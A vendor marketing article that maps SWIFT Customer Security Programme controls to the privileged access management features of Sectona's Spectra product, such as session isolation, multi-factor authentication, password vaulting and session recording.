The cyber-attack threats are ever increasing. There have been recent incidents of payment frauds in customer’s local environment. SWIFT’s payment community continues to suffer from numerous cyber-attacks and breaches. For year 2020, SWIFT promoted 2 existing advisory controls to mandatory and introduced 2 additional advisory controls resulting in 21 mandatory and 10 advisory controls in the CSCF v2020. The SWIFT has launched a CSP (Customer Security Programme) which aims to improve information sharing throughout the community. Through the programme, it also shares best practices for fraud detection and enhance support by third party providers.
The clause 1 of SWIFT CSP framework speaks about restrict internet access and protect critical systems from general IT environment. The framework speaks about the SWIFT environment protection i.e. the protection of user’s local SWIFT environment from potentially compromising elements of general IT environment and external environment. The framework states that there should be complete isolation of the SWIFT user’s environment. There should be complete control and access restrictions over OS Privileged accounts. It also emphasizes on securing the virtualization platforms. All the virtualization platforms and virtual machines (VMs) which are hosting SWIFT related components should be secured to the same level as physical systems.
The Spectra Privileged Access Management (PAM) Solution by Sectona with its hybrid access mechanism, ensures secure access to critical systems, including SWIFT infrastructure for users to accessing from internal or external environment. Spectra allows for privileged sessions to be accessed over browser to ensure true session isolation while also allowing direct client-based access without need for agent on the target device. There is also provision for access to be enabled through a secure Jump Host as well for session isolation. Spectra is a true cross platform capable solution which allows users to take access from any OS, any browser without any need for plugins. Spectra PAM has strong server privilege management & access control capabilities that allow for user access to be segregated based on workforce roles & responsibilities. Unauthorized access is eliminated by way of this capability. Spectra has strong integrations with Virtualization platforms & VMs and access to these can be secured with the same effect as for physical systems.
The clause 2.6 of this framework states that surface attacks and vulnerabilities should be reduced. There should be complete operator session confidentiality and integrity to be maintained. The interactive operator sessions connecting to local SWIFT infrastructure should be protected from surface attacks and vulnerabilities.
Sessions taken to the SWIFT infrastructure through Spectra PAM will be completely secured, controlled & monitored through a secure mechanism, and ensures protection of the confidentiality & integrity of sessions. Along with MFA to access any interactive session of SWIFT via PAM. In addition, the threat analytics engine within Spectra PAM calculates a composite risk score for each privileged session that helps with auditing and forensics much easily and faster.
The clause 2.8 of this framework speaks about the outsourcing of critical activities. It states that the local SWIFT infrastructure should be protected from the risks exposed by the outsourcing of critical activities.
Spectra can enable workflow-based access for outsourced activities to ensure that access to the SWIFT infrastructure is granted only after review & approval from authorized personnel. For any critical activity wherein the session may need to be shared over the internet with outsourced or third party vendors, Spectra enables a highly secure way of collaborating without revealing credentials and generating collaborative logs identifying and logging the activities that happened during the session.
The clause 2.9 of this framework states that all the business transactions should be controlled. All the business transactions taking place in the environment should be validated and authorized by the respective counter parties.
In Spectra PAM, time-based access can be provided to users taking access to SWIFT infrastructure. This ensures that the user access to SWIFT infrastructure is authorized at pre-decided time frame. In addition, workflow-based access can also be enabled to ensure users are given access only after review & approval. Multiple levels (up to 15) of approvals can be configured in Spectra.
The clause 4 highlights the prevention of credential compromisation. The clause 4.1 states that the effective password policies should be in place. The passwords should be resistant enough against common password attacks.
Spectra PAM has a robust password vault that supports customizable password change policies enabling password complexities and rotations with a wide range of combinations. Multiple Password Policies can be created, and they can either can be applied to an asset or group of assets. Spectra’s Password Vault can help schedule password changes on a regular basis & help set password complexities as desired. The vault is highly secure & passwords are encrypted with either AES 256 encryption or RSA 2048 encryption.
The clause 4.2 is about the multi-factor authentication. It requires prevention of compromised single authentication factor for allowing access into SWIFT environment.
Spectra is engineered to readily integrate with MFA providers such as RSA, Vasco, Safenet, Okta, OneLogin, Duo or Google Authenticator. Alternatively, it provides proprietary in-built Mobile OTP or Push Authentication and SMS or Email OTP options for multi factor authentication. 2FA mechanism ensures additional layer of security & control.
The clause 5 of this framework is speaks about managing identities and segregation of privileges. The clause 5.1 is about the logical access control, i.e. access should be provided on need-to-know basis, and duties for operator accounts should be segregated.
Spectra PAM follows the principle of least privileges and segregation of duties adding value by providing attribute-based grouping or AD grouping that can help reduce human effort involved with user mapping based on roles & responsibilities.
The clause 5.4 speaks about the protecting the logically and physically stored passwords in the SWIFT environment.
Spectra PAM has a robust password vault that supports customizable password change policies enabling password complexities and rotations with a wide range of combinations. Multiple Password Policies can be created, and they can either can be applied to an asset or group of assets. The vault is highly secure & passwords are encrypted with either AES 256 encryption or RSA 2048 encryption.
The clause 6 speaks about detection of anomalous activities to system or transaction records. The clause 6.4 states that all the security events should be recorded and detect anomalous actions and operations within the local SWIFT environment.
Spectra’s Session Recording module completely captures logs of all privileged sessions across target system sessions including access to SWIFT environment. In addition, the threat analytics engine within Spectra PAM calculates a composite risk score for each privileged session that helps with auditing and forensics much easily and faster. Spectra has an in-built Risk Scoring engine with a list of predefined plausible high-risk scenarios. The risk levels for these scenarios can be configured to incorporate desired risk levels of the organization. This Risk Scoring engine will help calculate composite risk score for each user session based on the activities in the session that thereby helps assess the access behavior. Spectra PAM has alert and notification engine to ensure to ensure timely alerts are sent to concerned personnel on execution of pre-defined critical commands or activities.
SWIFT has included an extensive list of best practices to be followed, the latest version of compliance document is available here. For those starting out with their privileged access security programs, start by targeting and identifying all privileged accounts. Leverage this list here to start your privileged access security program. Sectona team has come up with an interesting article about why running isolated privileged sessions for remote users is important, read it here.